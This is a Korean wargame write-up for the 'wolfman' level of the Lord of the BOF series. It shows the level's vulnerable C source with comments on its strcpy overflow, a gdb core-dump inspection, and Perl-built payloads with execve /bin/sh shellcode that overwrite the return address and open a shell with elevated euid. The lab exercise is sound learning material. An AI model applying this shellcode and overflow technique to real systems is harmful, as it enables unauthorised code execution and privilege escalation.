
/*1. Bash2 실행*/

[orc@localhost orc]$ bash2

/*2. 소스를 봅시다*/

[orc@localhost orc]$ cat wolfman.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - wolfman

        - egghunter + buffer hunter

*/


#include <stdio.h>

#include <stdlib.h>


/* Process environment: array of "NAME=value" strings, terminated by a NULL
 * pointer (main() below iterates it until environ[i] is NULL and zeroes
 * each string in place). */
extern char **environ;


/*
 * Entry point of the wolfman challenge binary.
 *
 * argv[1] is the only input. The function clears every environment string,
 * requires byte 47 of argv[1] to be 0xbf, copies argv[1] into a fixed
 * 40-byte stack buffer with strcpy(), prints it, then zeroes the buffer.
 *
 * Notes for the reader:
 *  - No return type is declared (implicit int, pre-C99 style), and memset(),
 *    strlen() and strcpy() are called without <string.h>, so they are
 *    implicitly declared as well.
 *  - strcpy() has no length bound, so an argv[1] longer than the buffer
 *    overruns it and overwrites whatever the compiler placed above it on the
 *    stack; the gdb session in this writeup shows bytes 44..47 of the
 *    argument landing on the saved return address. This unbounded copy is the
 *    stack buffer overflow the level is built around; a bounded copy
 *    (strncpy / snprintf with sizeof buffer) would remove it.
 *  - argv[1][47] is read before anything checks that argv[1] is at least 48
 *    bytes long, so a shorter argument reads past the end of the string.
 */
main(int argc, char *argv[])
{
char buffer[40];   /* 40-byte stack buffer; strcpy() below does not respect this size */
int i;

if(argc < 2){
printf("argv error\n");
exit(0);
}

// egghunter
// Zero the body of every environment string. Only the string contents are
// cleared -- the environ pointer array itself is left intact, and argv is
// not touched at all.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));

// Byte 47 of argv[1] must be 0xbf (the top byte of a 0xbfxxxxxx stack
// address, as the error message hints). No length check precedes this read.
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);   /* unbounded copy into buffer[40] -- the overflow */
printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);    // the buffer is 40 bytes, and all 40 of them are zeroed here
}

/*여기서, 버퍼는 사용할 수 없다는 것을 알게 됩니다. 그래서 대충 페이로드를 짜서 넣어 봅니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x47, "\xbf", "\x90"x16,"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` 

???????????????????????????????????????????????퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€

Segmentation fault (core dumped) //코어 덤프☆를 주니까 까봅시다.

/*3. gdb -q(환영메세지 없애기) '프로그램 이름' 'core'*/

[orc@localhost orc]$ gdb -q wolvman core

Core was generated by `./wolvman ???????????????????????????????????????????????퓧???????????????j

                    X?R'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp

0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffae0: 0x99580b6a 0x2f2f6852   0x2f686873 0x896e6962

0xbffffaf0: 0x895352e3 0x0080cde1 0xbffffb14    0x08048390

0xbffffb00: 0x0804861c 0x4000ae60 0xbffffb0c    0x40013e90

0xbffffb10: 0x00000002 0xbffffc13     0xbffffc1d    0x00000000

0xbffffb20: 0xbffffc75    0xbffffc83         0xbffffc9a    0xbffffcb9

0xbffffb30: 0xbffffcdb    0xbffffce4     0xbffffea7    0xbffffec6

0xbffffb40: 0xbffffedf     0xbffffef4     0xbfffff0f      0xbfffff1a

0xbffffb50: 0xbfffff32     0xbfffff3e     0xbfffff46     0xbfffff50

0xbffffb60: 0xbfffff60     0xbfffff6e     0xbfffff7c         0xbfffff8d

0xbffffb70: 0xbfffff98     0xbfffffa7     0xbfffffe6     0x00000000

0xbffffb80: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb90: 0x00000005 0x00000006

(gdb) 

0xbffffb98: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffba8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbb8: 0x0000000b 0x000001f8 0x0000000c 0x000001f8

0xbffffbc8: 0x0000000d 0x000001f8 0x0000000e 0x000001f8

0xbffffbd8: 0x00000010 0x0febfbff    0x0000000f 0xbffffc0e

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x36690000 0x2e003638 0x6c6f772f

0xbffffc18: 0x6e616d76 0x90909000 0x90909090 0x90909090

0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x909090bf 0x90909090 0x90909090

0xbffffc58: 0x90909090 0x580b6a90

(gdb) quit

/*제가 이 문제를 풀었을 때는 쉘코드가 0xbffffc37 지점에 있었는데 말이죠..;;.......

암튼 공격해봤습니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????


bash$ exit     //잘되네여

exit

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????

bash$ my-pass

euid = 505    //땋

이번엔.. 쉽게 풀었네요ㅋㅋ
